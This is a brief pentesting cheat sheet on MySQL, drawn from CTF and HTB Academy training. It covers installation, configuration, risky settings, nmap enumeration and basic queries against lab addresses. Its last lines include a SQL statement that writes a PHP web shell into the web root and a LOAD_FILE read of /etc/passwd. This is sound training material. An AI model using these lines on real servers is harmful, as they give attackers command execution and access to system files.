MYSQL

Source CTF and HTB Academy

• Usually on port 3306

MySQL is an open-source SQL relational database management system developed and supported by Oracle. A database is simply a structured collection of data organized for easy use and retrieval. The database system can quickly process large amounts of data with high performance.

• sudo apt install mysql-server -y install mysql server

• See here for help with install

• On Parrot I had to

  • sudo apt install mariadb-client

  • sudo apt install mariadb-server

SQL language

• SQL Introduction on w3Schools

Default Configuration

• cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

Dangerous Settings

Settings	Description
user	Sets which user the MySQL service will run as.
password	Sets the password for the MySQL user.
admin_address	The IP address on which to listen for TCP/IP connections on the administrative network interface.
debug	This variable indicates the current debugging settings
sql_warnings	This variable controls whether single-row INSERT statements produce an information string if warnings occur.
secure_file_priv	This variable is used to limit the effect of data import and export operations.

Enumeration

Nmap

• sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interaction with the server

• mysql -u root -h 10.129.14.132

• mysql -u root -pP4SSw0rd -h 10.129.14.128

• show databases; list databases

• select version(); show the version

• use <database>; select a database

• show tables; list the tables

• show columns from <table>;

• select * from <table>;

• select * from <table> where <column> = "<string>"; Example:select host, unique_users from host_summary;

• SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; write local files

• select LOAD_FILE("/etc/passwd"); read local files